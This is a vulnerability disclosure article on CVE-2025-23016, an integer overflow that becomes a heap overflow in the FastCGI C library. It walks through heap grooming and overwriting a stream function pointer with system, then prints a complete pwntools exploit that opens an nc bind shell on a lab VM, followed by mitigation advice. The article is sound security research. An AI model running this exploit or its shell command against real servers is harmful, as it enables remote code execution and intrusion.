CVE-2025-23016 - Exploiting the FastCGI library

Written by Baptiste Mayaud - 23/04/2025 - in Exploit

At the beginning of 2025, as part of our internal research, we discovered a vulnerability in the FastCGI lightweight web server development library.
In this article, we'll take a look at the inner workings of the FastCGI protocol to understand how and in what context this vulnerability can be exploited. Finally, we'll see how to protect against it.


Introduction

FastCGI is a C library for developing compiled web applications. It defines a way for a web server such as NGINX to communicate with third-party software, and is an evolution of the Common Gateway Interface (CGI).

Its main advantage is its ability to integrate lightweight web applications. This feature means that the library is mainly used in equipment with low computing power, such as cameras.

It should be noted that PHP-FPM, the PHP integration of FastCGI, reimplements the FCGI protocol and does not use the FastCGI library.

The FastCGI protocol

A FastCGI-based web application works as follows. An HTTP server, such as Nginx, lighttpd or Apache HTTP Server, listens on a given port.
Once it has processed a request, it sends a message to the CGI binary using the FCGI protocol. This message can be transported in two ways: over a TCP socket or over a UNIX socket. The choice of transport is left to the developer and is communicated to the HTTP server, usually through a configuration file.

Every FCGI record starts with an FCGI_Header, which indicates the type of the record and its size.

typedef struct {
    unsigned char version;
    unsigned char type;
    unsigned char requestIdB1;
    unsigned char requestIdB0;
    unsigned char contentLengthB1;
    unsigned char contentLengthB0;
    unsigned char paddingLength;
    unsigned char reserved;
} FCGI_Header;
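
As an illustration, the 8-byte header can be packed and unpacked with Python's struct module. This is only a minimal sketch: the helper names pack_header and unpack_header are hypothetical, and the two-byte fields are treated as big-endian because the B1 byte precedes the B0 byte in the structure.

```python
import struct

# Layout of FCGI_Header: version, type, requestId (B1, B0),
# contentLength (B1, B0), paddingLength, reserved.
HEADER_FORMAT = ">BBHHBB"

def pack_header(rec_type, request_id, content_length, padding_length=0):
    """Build the 8-byte header; the version field is set to 1."""
    return struct.pack(HEADER_FORMAT, 1, rec_type, request_id,
                       content_length, padding_length, 0)

def unpack_header(data):
    """Split an 8-byte header into its named fields."""
    version, rec_type, request_id, content_length, padding, _ = \
        struct.unpack(HEADER_FORMAT, data[:8])
    return {"version": version, "type": rec_type, "requestId": request_id,
            "contentLength": content_length, "paddingLength": padding}

header = pack_header(1, 1, 8)
print(header.hex())
print(unpack_header(header))
```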

In a conventional exchange, an FCGI_BEGIN_REQUEST record is sent first.

It is made up of the FCGI_Header, followed by an additional structure, the FCGI_BeginRequestBody.

typedef struct {
    unsigned char roleB1;
    unsigned char roleB0;
    unsigned char flags;
    unsigned char reserved[5];
} FCGI_BeginRequestBody;

This record initiates the request. It specifies the role expected from the application, as well as flags such as whether to keep the connection open once the request is finished.

The only thing to note here is that, without a role, any incoming packet is considered invalid and therefore destroyed.
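
To make the layout concrete, here is a small Python sketch that builds a complete FCGI_BEGIN_REQUEST record (header plus body). The function name begin_request_record is hypothetical; the numeric constants are the ones defined by the FastCGI specification.

```python
import struct

FCGI_BEGIN_REQUEST = 1   # record type
FCGI_RESPONDER = 1       # role
FCGI_KEEP_CONN = 1       # flag: keep the connection open after the request

def begin_request_record(request_id, role=FCGI_RESPONDER, flags=0):
    """FCGI_Header followed by FCGI_BeginRequestBody (8 + 8 bytes)."""
    # roleB1, roleB0, flags, reserved[5]
    body = struct.pack(">HB5x", role, flags)
    header = struct.pack(">BBHHBB", 1, FCGI_BEGIN_REQUEST,
                         request_id, len(body), 0, 0)
    return header + body

record = begin_request_record(1)
print(len(record), record.hex())
```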

Once the role has been defined, the FCGI_Header is followed by a series of parameters. A parameter is made up of four elements: two sizes, a key and a value. The first size is the size of the key, the second the size of the value.

Sizes are encoded on either 8 or 32 bits, depending on their value. A size of 0x80 or more is encoded on 32 bits, with the high bit of its first byte set. Once a parameter has been read, the following bytes are interpreted as a new parameter, until the end of the data or until the size indicated in the FCGI_Header has been reached.

These parameters carry the data transmitted by the HTTP server. They include keys such as "QUERY_STRING", which holds the query string of the HTTP request. Using these keys, developers can access the HTTP request data to build their web application.
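
The encoding described above can be sketched in a few lines of Python. The helper names are hypothetical and the decoder is a simplified model of the parsing loop, not the library's code; it assumes well-formed input.

```python
def encode_length(n):
    """One byte below 0x80, otherwise four bytes with the high bit set."""
    if n < 0x80:
        return bytes([n])
    return (n | 0x80000000).to_bytes(4, "big")

def encode_param(name, value):
    return encode_length(len(name)) + encode_length(len(value)) + name + value

def decode_length(data, pos):
    """Return (length, position of the byte following the length)."""
    first = data[pos]
    if first & 0x80 == 0:
        return first, pos + 1
    length = ((first & 0x7f) << 24) | int.from_bytes(data[pos + 1:pos + 4], "big")
    return length, pos + 4

def decode_params(data):
    """Read key/value pairs until the data is exhausted."""
    params, pos = {}, 0
    while pos < len(data):
        name_len, pos = decode_length(data, pos)
        value_len, pos = decode_length(data, pos)
        name = data[pos:pos + name_len]
        value = data[pos + name_len:pos + name_len + value_len]
        params[name] = value
        pos += name_len + value_len
    return params

body = encode_param(b"QUERY_STRING", b"uptime&ntstat") + encode_param(b"X", b"v" * 200)
print(decode_params(body)[b"QUERY_STRING"])
```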

Vulnerability

static int ReadParams(Params *paramsPtr, FCGX_Stream *stream)
{
    int nameLen, valueLen;
    unsigned char lenBuff[3];
    char *nameValue;

    while((nameLen = FCGX_GetChar(stream)) != EOF) {
        /*
         * Read name length (one or four bytes) and value length
         * (one or four bytes) from stream.
         */
        if((nameLen & 0x80) != 0) {
            if(FCGX_GetStr((char *) &lenBuff[0], 3, stream) != 3) {
                SetError(stream, FCGX_PARAMS_ERROR);
                return -1;
            }
            nameLen = ((nameLen & 0x7f) << 24) + (lenBuff[0] << 16)
                    + (lenBuff[1] << 8) + lenBuff[2];
        }
        if((valueLen = FCGX_GetChar(stream)) == EOF) {
            SetError(stream, FCGX_PARAMS_ERROR);
            return -1;
        }
        if((valueLen & 0x80) != 0) {
            if(FCGX_GetStr((char *) &lenBuff[0], 3, stream) != 3) {
                SetError(stream, FCGX_PARAMS_ERROR);
                return -1;
            }
            valueLen = ((valueLen & 0x7f) << 24) + (lenBuff[0] << 16)
                    + (lenBuff[1] << 8) + lenBuff[2];
        }
        /*
         * nameLen and valueLen are now valid; read the name and value
         * from stream and construct a standard environment entry.
         */
        nameValue = (char *)Malloc(nameLen + valueLen + 2);
        if(FCGX_GetStr(nameValue, nameLen, stream) != nameLen) {
            SetError(stream, FCGX_PARAMS_ERROR);
            free(nameValue);
            return -1;
        }
        *(nameValue + nameLen) = '=';
        if(FCGX_GetStr(nameValue + nameLen + 1, valueLen, stream)
                != valueLen) {
            SetError(stream, FCGX_PARAMS_ERROR);
            free(nameValue);
            return -1;
        }
        *(nameValue + nameLen + valueLen + 1) = '\0';
        PutParam(paramsPtr, nameValue);
    }
    return 0;
}

The ReadParams function takes a pointer to FCGX_Stream as parameter, which corresponds to the data stream received by the socket, and fills a pointer to a Params structure.

This function will read the incoming stream until it is exhausted, or until an error occurs in the protocol.

For each length, the function reads a first byte. If it is greater than or equal to 0x80, the size is encoded on 4 bytes instead of one.
The next 3 bytes are then read and combined with the first one to build a 4-byte integer. The 0x7f mask applied to the first byte guarantees that this integer cannot exceed INT_MAX. This matters because the size is later added to another integer retrieved in the same way, and the mask is meant to avoid an integer overflow.

if((nameLen & 0x80) != 0) {
    if(FCGX_GetStr((char *) &lenBuff[0], 3, stream) != 3) {
        SetError(stream, FCGX_PARAMS_ERROR);
        return -1;
    }
    nameLen = ((nameLen & 0x7f) << 24) + (lenBuff[0] << 16)
            + (lenBuff[1] << 8) + lenBuff[2];
}

So far so good. The problem arises in the call to malloc.

nameValue = (char *)Malloc(nameLen + valueLen + 2);

A +2 is added to the allocation size, most likely to store the “=” character between the key and the value, plus a null byte at the end of the string.

However, 0x7fffffff + 0x7fffffff + 1 = 0xffffffff, so
0x7fffffff + 0x7fffffff + 2 = 0 once truncated to 32 bits.

This equality only holds on a 32-bit machine. The result of this calculation is stored in an integer whose type is not defined by the types of nameLen and valueLen, but by the type of malloc's parameter. In stdlib, this parameter is a size_t, whose definition depends on the target machine. On a 64-bit machine, a size_t is 8 bytes wide, which is enough to store the maximum result of the calculation. On a 32-bit machine, it is only 4 bytes wide, so the result wraps around: an integer overflow.

Note that malloc, when allocating a size smaller than 0x10, will allocate 0x10 bytes.

If the two sizes provided are 0xffffffff on a 32-bit machine, the result is an allocation of 0x10 bytes, while the binary considers the key and the value to be 0x7fffffff bytes long each. Indeed, the mask on the first byte reduces it from 0xff to 0x7f.
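
The arithmetic can be replayed in Python. This is a sketch of the 32-bit case only: Python integers do not overflow, so the truncation to 4 bytes is modelled with an explicit mask, and the function name is hypothetical.

```python
MASK32 = 0xffffffff

def decode_four_byte_length(raw):
    """Same computation as in ReadParams: the high bit of the first byte is masked off."""
    return ((raw[0] & 0x7f) << 24) + (raw[1] << 16) + (raw[2] << 8) + raw[3]

name_len = decode_four_byte_length(b"\xff\xff\xff\xff")
value_len = decode_four_byte_length(b"\xff\xff\xff\xff")

# Model of the 32-bit case: the sum is truncated to 4 bytes.
requested = (name_len + value_len + 2) & MASK32

print(hex(name_len), hex(value_len), hex(requested))
```

The requested size wraps to 0 while each length remains 0x7fffffff, which is the mismatch exploited in the rest of the article.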

This integer overflow leads to a more important vulnerability, the one that will actually be exploited in this article: a heap overflow.

Once allocated, the pointer returned by malloc is directly used to accommodate user input.

if(FCGX_GetStr(nameValue, nameLen, stream) != nameLen) {
    //...
}

The FCGX_GetStr function takes a pointer, a size and the FCGX_Stream to read from, then reads as many bytes as requested from the FCGX_Stream into the pointer supplied as the first parameter.

In practice, this could be a problem: with a size of 0x7fffffff, the write outside the buffer would reach the end of the heap and crash when hitting an unmapped area.

However, the FCGX_Stream system allows you to control the size written to the target buffer.

int FCGX_GetStr(char *str, int n, FCGX_Stream *stream)
{
    int m, bytesMoved;

    if (stream->isClosed || ! stream->isReader || n <= 0) {
        return 0;
    }
    /*
     * Fast path: n bytes are already available
     */
    if(n <= (stream->stop - stream->rdNext)) {
        memcpy(str, stream->rdNext, n);
        stream->rdNext += n;
        return n;
    }
    /*
     * General case: stream is closed or buffer fill procedure
     * needs to be called
     */
    bytesMoved = 0;
    for (;;) {
        if(stream->rdNext != stream->stop) {
            m = min(n - bytesMoved, stream->stop - stream->rdNext);
            memcpy(str, stream->rdNext, m);
            bytesMoved += m;
            stream->rdNext += m;
            if(bytesMoved == n)
                return bytesMoved;
            str += m;
        }
        if(stream->isClosed || !stream->isReader)
            return bytesMoved;
        stream->fillBuffProc(stream);
        if (stream->isClosed)
            return bytesMoved;

        stream->stopUnget = stream->rdNext;
    }
}

The FCGX_Stream structure contains a pointer to the next byte to be read, rdNext, and a pointer to the end of the data received from the socket, stop.

The FCGX_GetStr function uses these pointers to avoid reading further than what has been received into the stream. Consequently, if the stream is exhausted, the write to the target buffer stops.
This stop condition lets us control the number of bytes written to the target buffer, regardless of the size passed to FCGX_GetStr. We just need to ensure that the corrupted parameter is the last one in our stream.

In short, an integer overflow in the parameter processing function leads to a buffer overflow in the heap whose size is controlled.
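
The bounded copy can be illustrated with a toy Python model of the stream. It is a deliberate simplification: the class and method names are hypothetical, and it assumes that no further data arrives once the buffer is exhausted, so the refill step is left out.

```python
class StreamModel:
    """Toy model of FCGX_Stream: only the bytes already received can be read."""

    def __init__(self, received):
        self.buffer = received
        self.rd_next = 0              # index of the next byte to read
        self.stop = len(received)     # index just past the last valid byte

    def get_str(self, n):
        """Return at most n bytes, whatever the requested size."""
        if n <= 0:
            return b""
        m = min(n, self.stop - self.rd_next)
        chunk = self.buffer[self.rd_next:self.rd_next + m]
        self.rd_next += m
        return chunk

stream = StreamModel(b"A" * 52)
copied = stream.get_str(0x7fffffff)   # size announced by the corrupted parameter
print(len(copied))
```

Even though 0x7fffffff bytes are requested, the number of bytes copied equals the number of bytes the sender actually placed in the stream.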

Demonstration environment

A virtual machine on which lighttpd and its FastCGI module have been installed has been set up for demonstration purposes.

The demo web application is a simplistic binary that reports system monitoring data.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <string.h>

#include <fcgi_config.h>
#include <fcgiapp.h>

#define NTSTAT (2)
#define UPTIME (1)

char *exec_cmd(char *command)
{
    int link[2];
    pid_t pid;
    char *res = malloc(4096);

    if (res == NULL)
        return NULL;

    if (pipe(link) == -1)
        return NULL;

    if ((pid = fork()) == -1)
        return NULL;

    if(pid == 0) {
        dup2(link[1], STDOUT_FILENO);
        close(link[0]);
        close(link[1]);
        system(command);
        exit(0);
    }
    else {
        close(link[1]);
        int nbytes = read(link[0], res, 4095);
        res[nbytes] = 0;
        wait(NULL);
    }
    return res;
}

unsigned char readArgs(char *query)
{
    unsigned char ret = 0;
    char *buf = NULL;

    while ((buf = strtok(query, "&")) != NULL) {
        if (!strncmp(buf, "uptime", 6))
            ret |= UPTIME;
        else if (!strncmp(buf, "ntstat", 6))
            ret |= NTSTAT;
        query = NULL;
    }
    return ret;
}

void write_log(const char *log_content) {
    FILE *file = fopen("/tmp/log.txt", "ab");
    if (file == NULL) {
        perror("Error opening file");
        return;
    }
    
    // Write the string
    while (*log_content) {
        fputc(*log_content, file);
        log_content++;
    }
    
    // Write the trailing newline
    fputc('\n', file);
    
    fclose(file);
}

void do_log(FCGX_Request *request)
{
    char *uri = FCGX_GetParam("REQUEST_URI", request->envp);
    char *status = FCGX_GetParam("REDIRECT_STATUS", request->envp);
    char *remote = FCGX_GetParam("REMOTE_ADDR", request->envp);

    if (uri == NULL || status == NULL || remote == NULL)
        return;

    size_t total_size = strlen(uri) + strlen(status) + strlen(remote)+ 4;
    char *buf = malloc(total_size + 1);

    if (buf == NULL)
        return;

    snprintf(buf, total_size, "%s: %s:%s", remote, uri, status);
    write_log(buf);
    free(buf);
}

int main ()
{
    FCGX_Request request;

    FCGX_Init();
    FCGX_InitRequest(&request, 0, 0);
    int count = 0;

    while (FCGX_Accept_r(&request) >= 0) {
        char *query = FCGX_GetParam("QUERY_STRING", request.envp);
        char *uptime = exec_cmd("/usr/bin/uptime");
        char *ntstat = exec_cmd("/usr/bin/netstat -lt");
        int len = 0;

        do_log(&request);
        if (uptime == NULL || ntstat == NULL) {
            FCGX_FPrintF(request.out,
                "Content-type: text/html\r\n"
                "\r\n"
                "<title>Monitor server</title>"
                "<h1>Server monitoring</h1>\n"
                "<p>error</p>");
        }
        else {
            FCGX_FPrintF(request.out,
                "Content-type: text/html\r\n"
                "\r\n"
                "<title>Monitor server</title>"
                "<h1>Server monitoring</h1>\n");
            
            unsigned char args = readArgs(query);
            switch (args) {
                case 0:
                    FCGX_FPrintF(request.out,
                        "<p>NULL<p>\n");
                    break;
                case UPTIME:
                    FCGX_FPrintF(request.out,
                        "<p>%s<p>\n", uptime);
                    break;
                case NTSTAT:
                    FCGX_FPrintF(request.out,
                        "<p>%s<p>\n", ntstat);
                    break;
                case NTSTAT | UPTIME:
                    FCGX_FPrintF(request.out,
                        "<p>%s</p>"
                        "<p>%s<p>\n", uptime, ntstat);
                    break;
            }
            free(uptime);
            free(ntstat);
        }
        
        FCGX_Finish_r(&request);

    }

    return 0;
}

 

The initial plan was to demonstrate the vulnerability through a server vulnerable to SSRF: a request controlled by the attacker is issued by the web server to a port listening on 127.0.0.1, which gives access to the FastCGI socket. When properly configured, this socket only listens locally.

However, while looking for documentation on how to configure lighttpd for FastCGI, we noticed that the first result returned by Google leads the reader to a vulnerable lighttpd setup.

Indeed, the configuration file given as an example exposes the FastCGI socket.

fastcgi.server = ( "/remote_scripts/" =>
    (( "host" => "192.168.0.3",
       "port" => 9000,
       "check-local" => "disable",
       "docroot" => "/" # remote server may use
                        # its own docroot
    ))
)

We decided to follow this tutorial.

To summarize, a virtual machine accessible over a LAN provides a web service to report system metrics using FastCGI and lighttpd. The lighttpd configuration is vulnerable by exposing the FastCGI socket.
All system and binary protections are active except PIE.

Exploitation

A vulnerability of this type, in a library rather than in an application or a system, is by nature highly dependent on the context in which the library is used.
For the purposes of this article, it seemed more appropriate to build an exploit as independent as possible from the binary using the library.
Initially, the idea was to corrupt malloc's caches. Further research showed that FastCGI itself provides everything needed to take control of the execution flow. Corrupting malloc's caches was therefore unnecessary, which also makes this exploit independent of the C library version present on the machine.

The chosen exploitation method is based on the FCGX_Stream structure and its use.
This is represented as follows:

typedef struct FCGX_Stream {
    unsigned char *rdNext;    /* reader: first valid byte
                               * writer: equals stop */
    unsigned char *wrNext;    /* writer: first free byte
                               * reader: equals stop */
    unsigned char *stop;      /* reader: last valid byte + 1
                               * writer: last free byte + 1 */
    unsigned char *stopUnget; /* reader: first byte of current buffer
                               * fragment, for ungetc
                               * writer: undefined */
    int isReader;
    int isClosed;
    int wasFCloseCalled;
    int FCGI_errno;                /* error status */
    void (*fillBuffProc) (struct FCGX_Stream *stream);
    void (*emptyBuffProc) (struct FCGX_Stream *stream, int doClose);
    void *data;
} FCGX_Stream;

It is particularly interesting for three reasons. The first is the presence of the fillBuffProc and emptyBuffProc function pointers. Being able to overwrite them from the heap makes it possible to take control of the execution flow without having to overwrite an entry of the GOT (Global Offset Table), potentially protected by RELRO (Relocation Read-Only), or the malloc and free hooks, which were removed in glibc 2.34.

The second reason is that this structure is destroyed and reallocated for each FCGI request. It is therefore potentially possible to get malloc to return a pointer located just before this structure, so that the exploit depends only on relative positions and not on known addresses, making ASLR ineffective.

The third and final reason is the way fillBuffProc is called:

stream->fillBuffProc(stream);

The structure itself is passed as the argument, so controlling its first bytes means controlling the data the argument points to.
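
To see where each field sits, the structure can be modelled with ctypes. This is a sketch under an assumption: a 32-bit target where pointers and int are both 4 bytes wide, so pointers are represented here as 32-bit integers. The class name FCGXStream32 is hypothetical.

```python
import ctypes

class FCGXStream32(ctypes.Structure):
    """FCGX_Stream as laid out on a 32-bit target (4-byte pointers and ints)."""
    _fields_ = [
        ("rdNext", ctypes.c_uint32),
        ("wrNext", ctypes.c_uint32),
        ("stop", ctypes.c_uint32),
        ("stopUnget", ctypes.c_uint32),
        ("isReader", ctypes.c_int32),
        ("isClosed", ctypes.c_int32),
        ("wasFCloseCalled", ctypes.c_int32),
        ("FCGI_errno", ctypes.c_int32),
        ("fillBuffProc", ctypes.c_uint32),
        ("emptyBuffProc", ctypes.c_uint32),
        ("data", ctypes.c_uint32),
    ]

# Print the offset of every field, then the total size of the structure.
for name, _ in FCGXStream32._fields_:
    print(f"{name:16s} offset {getattr(FCGXStream32, name).offset:#04x}")
print("total size:", hex(ctypes.sizeof(FCGXStream32)))
```

Under this assumption, 0x20 bytes of controlled data precede fillBuffProc, and the first of them are what system receives as its command string.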

The exploitation strategy is as follows:

  • Obtain a vulnerable pointer preceding the FCGX_Stream structure.
  • Overflow its buffer to overwrite the structure, replacing fillBuffProc with the PLT entry of system and writing “/bin/sh” at the start of the structure.
  • Get a call to fillBuffProc without crashing the binary first.

In this case, the binary calls system and is not compiled as PIE, so the address of the function's PLT entry is known. Note also that all the web servers tested restart the FastCGI binary when it crashes. As this vulnerability can only be exploited in 32-bit mode, it is quite realistic, in a different context, to imagine brute-forcing the address of system directly in the libc.
Moreover, since the stream's data pointers are controlled, it is also possible to obtain a memory leak beforehand, depending on the application's context.

To obtain a vulnerable pointer preceding the FCGX_Stream structure, we first need to ensure that the structure is always located at the same place relative to our allocations. As previously mentioned, it is destroyed and reallocated for each request, so its position on the heap varies from one cycle to the next. The simplest method is to crash the binary once and rely on the structure's position in the binary's initial state. This way, when the CGI binary is restarted, the structure is where we expect it to be.

Next, the parameters read in ReadParams are used to consume, one by one and in the right order, the chunks that have already been freed.
Indeed, when free is called, the allocator marks the freed zone as usable again and records its size and position. This zone can then be handed out again by a later call to malloc, provided the requested size is no larger than that of the freed zone.

A first request is sent to the web server with curl, so that memory zones are allocated and then freed, in the hope that the FCGX_Stream structure will be reallocated right after a freed zone.

Once this first web request has been sent, a second one is issued and the 0x30 bytes preceding our structure, located here at address 0x804e6e0, are inspected.

gef➤  x/32wx 0x0804e6e0-0x30
0x804e6b0:  0x2e383631  0x2e363031  0x00000039  0x00000021
0x804e6c0:  0x0804e708  0xb7fb4778  0x3d54524f  0x35383534
0x804e6d0:  0x00000034  0x00000000  0x000000e0  0x00000030
0x804e6e0:  0x0804c3fa  0x0804c5a0  0x0804c5a0  0x0804c3f8

Note that an area of size 0x20 has indeed been freed. Getting an allocation here will therefore be our goal.

Note, however, that our vulnerable allocation will be 0x10 and not 0x20. So, in reality, we'll need to obtain an allocation at our freed zone + 0x10.

To achieve this, we'll need to “pop” the freed zones until we reach the 0x20 zone, then allocate another 0x10 pointer so that only a 0x10 zone - the one between the last allocated pointer and our structure - remains free for the next call to a malloc of size smaller than 0x10.

By obtaining a contiguous pointer, we avoid overwriting the metadata used by malloc to remember the sizes and memory areas freed by the other pointers. This will avoid crashing the binary before reaching fillBuffProc.

By analyzing the state of the heap at the time of the call to ReadParams, we've determined that, in our context, it will take nine allocations of 0x30 and then two of 0x10 for malloc to provide the pointer preceding our structure when it's asked for a size of 0x10 or less.

In the ReadParams function's parameter reading loop, the corrupted parameter will be preceded by nine valid parameters of size 0x30, and two of size 0x10.
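
The sizes involved can be checked with a simplified Python model of how a request size maps to a chunk size. The constants below (4-byte size field, 16-byte granularity) are assumptions about a 32-bit glibc build and may differ on other allocators; the function names are hypothetical.

```python
SIZE_SZ = 4          # assumed size of the chunk size field on a 32-bit target
ALIGNMENT = 16       # assumed allocation granularity
MIN_CHUNK = 0x10     # smallest chunk, as noted earlier in the article

def chunk_size(request):
    """Approximate chunk size used to serve malloc(request)."""
    padded = (request + SIZE_SZ + ALIGNMENT - 1) & ~(ALIGNMENT - 1)
    return max(padded, MIN_CHUNK)

def param_request(name_len, value_len):
    """Size passed to Malloc by ReadParams, truncated to 32 bits."""
    return (name_len + value_len + 2) & 0xffffffff

# Nine valid parameters, two empty ones, then the corrupted one.
params = [(0x13, 0x13)] * 9 + [(0, 0)] * 2 + [(0x7fffffff, 0x7fffffff)]
sizes = [chunk_size(param_request(n, v)) for n, v in params]
print([hex(s) for s in sizes])
```

With these assumptions, the first nine parameters consume 0x30 chunks, and the last three requests, including the corrupted one, are served from 0x10 chunks.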

The next step is to exploit the integer overflow to trigger a buffer overflow and overwrite the FCGX_Stream structure, so that fillBuffProc is replaced by the PLT entry of system and then called with the first bytes of the structure forming a valid shell command.

The next potential call to fillBuffProc is made in the FCGX_GetChar function.

int FCGX_GetChar(FCGX_Stream *stream)
{
    if (stream->isClosed || ! stream->isReader)
        return EOF;

    if (stream->rdNext != stream->stop)
        return *stream->rdNext++;

    stream->fillBuffProc(stream);
    if (stream->isClosed)
        return EOF;

    stream->stopUnget = stream->rdNext;
    if (stream->rdNext != stream->stop)
        return *stream->rdNext++;

    ASSERT(stream->isClosed); /* bug in fillBufProc if not */
    return EOF;
}

For fillBuffProc to be called, the isClosed field must be zero, isReader must be non-zero and rdNext must be equal to stop.

Fortunately, no pointer dereferencing takes place before the corrupted function pointer is called.

The isClosed condition limits the size of our command string, isReader has no impact, and the rdNext condition forces the first four bytes of our command string to be equal to the four bytes in twelfth position.
None of these conditions is insurmountable, but the size of our command string is limited.

The string " /bi;nc -lve /bin/sh" followed by 4 null bytes satisfies these conditions and leads the FCGX_GetChar function to call fillBuffProc. This is now system, called with a command string that starts a shell listening on a random port between 30,000 and 50,000, leading to arbitrary code execution.

In practice, the command cannot be longer than 15 characters in this configuration. However, as mentioned above, HTTP servers restart the FastCGI binary when it crashes. It is therefore possible to replay the exploit several times to write a command to a file using "echo abc > a" and then execute it, bypassing the size limit.
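
The layout of the overflowing data can be checked offline with a short Python sketch. It relies on several assumptions: a 32-bit little-endian layout in which isReader, isClosed and fillBuffProc sit at offsets 16, 20 and 32 of the structure, 16 bytes of padding between the vulnerable pointer and the structure (the value used in the final exploit), and the system PLT address printed by the exploit run in this article.

```python
import struct

SYSTEM_PLT = 0x80490b0            # address printed by the exploit run in this article
COMMAND = b" /bi;nc -lve /bin/sh"

padding = b"a" * 16               # bytes written before reaching the structure
overflow = (padding + COMMAND
            + struct.pack("<III", 0, 0, 0)
            + struct.pack("<I", SYSTEM_PLT))

structure = overflow[len(padding):]   # the part that lands on FCGX_Stream
is_reader, is_closed = struct.unpack_from("<II", structure, 16)
fill_buff_proc, = struct.unpack_from("<I", structure, 32)

print(hex(is_reader), is_closed, hex(fill_buff_proc))
print(structure[0:4] == structure[12:16])
```

The four null bytes that follow the command both terminate the string and keep isClosed at zero, while the command repeats its first four bytes at offset 12.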

The final exploit becomes:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *

exe = context.binary = ELF('./test')

def start(argv=[], *a, **kw):
    return remote("192.168.106.9", 9003)

"""
typedef struct {
    unsigned char version;
    unsigned char type;
    unsigned char requestIdB1;
    unsigned char requestIdB0;
    unsigned char contentLengthB1;
    unsigned char contentLengthB0;
    unsigned char paddingLength;
    unsigned char reserved;
} FCGI_Header;
"""

def makeHeader(type, requestId, contentLength, paddingLength):
    header = p8(1) + p8(type) + p16(requestId) + p16(contentLength)[::-1] + p8(paddingLength) + p8(0)
    return header

"""
typedef struct {
    unsigned char roleB1;
    unsigned char roleB0;
    unsigned char flags;
    unsigned char reserved[5];
} FCGI_BeginRequestBody;
"""

def makeBeginReqBody(role, flags):
    return p16(role)[::-1] + p8(flags) + b"\x00" * 5

io = start()

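# Record of type 9 (FCGI_GET_VALUES in the FastCGI specification) carrying the parameters
header = makeHeader(9, 0, 900, 0)

print(hex(exe.plt["system"]))

# Nine valid parameters (0x13-byte key, 0x13-byte value): allocations of 0x30
params_0x30 = (p8(0x13) + p8(0x13) + b"b" * 0x26) * 9
# Two empty parameters (both sizes set to 0): allocations of 0x10
params_0x10 = p8(0) * (2 * 2)
# Corrupted parameter: both sizes are decoded as 0x7fffffff
corrupted_sizes = p32(0xffffffff) + p32(0xffffffff)
# Overflow data: padding up to the FCGX_Stream structure, the command string,
# zeroed fields, then fillBuffProc replaced by the PLT entry of system
overflow = b"a" * (4 * 4) + b" /bi;nc -lve /bin/sh" + p32(0) * 3 + p32(exe.plt["system"])

io.send(makeHeader(1, 1, 8, 0) + makeBeginReqBody(1, 0) + header
        + params_0x30 + params_0x10 + corrupted_sizes + overflow)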

io.close()

➜  article git:(master) ✗ ./exploit.py
[*] './test'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Opening connection to 192.168.106.9 on port 9003: Done
0x80490b0
[*] Closed connection to 192.168.106.9 port 9003
➜  article git:(master) ✗ sudo nmap -T4 192.168.106.9 -p30000-50000
Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-12 18:46 CET
Nmap scan report for 192.168.106.9
Host is up (0.00024s latency).
Not shown: 20000 closed ports
PORT      STATE SERVICE
39649/tcp open  unknown
MAC Address: 08:00:27:E9:86:0A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds
➜  article git:(master) ✗ nc 192.168.106.9 39649
id
uid=1000(osboxes) gid=1000(osboxes) groups=1000(osboxes),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth)
ls /
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old

Mitigating the issue

The vulnerability was reported through a GitHub issue. After discussions with the maintainers, a pull request was submitted to add the missing checks and fix the bug.

Updating to version 2.4.5 protects against the vulnerability. If you install the library from packages, make sure that they are based on version 2.4.5 or higher.

We also recommend limiting potential remote access to the FastCGI socket by declaring it as a UNIX socket.
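
As a quick way to audit an existing deployment, the following Python sketch checks whether a TCP port accepts connections. The function name is hypothetical, and the host and port to test are left to the reader; running it from another machine against the FastCGI port shows whether the socket is exposed.

```python
import socket

def is_tcp_port_open(host, port, timeout=1.0):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Example (hypothetical address and port):
# is_tcp_port_open("192.0.2.10", 9000)
```

A result of True from a remote host means the FastCGI socket is reachable over the network and should be restricted.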

Conclusion

FastCGI, despite a relatively small number of known vulnerabilities since its creation in 1996 and its frequent use in embedded devices, is not free from implementation problems.

However, this flaw is easy to fix, and good deployment practices may have protected some servers even before the vulnerability was published.

In the meantime, it may be a good idea to add rules that check, at the very least, that your web server is correctly configured.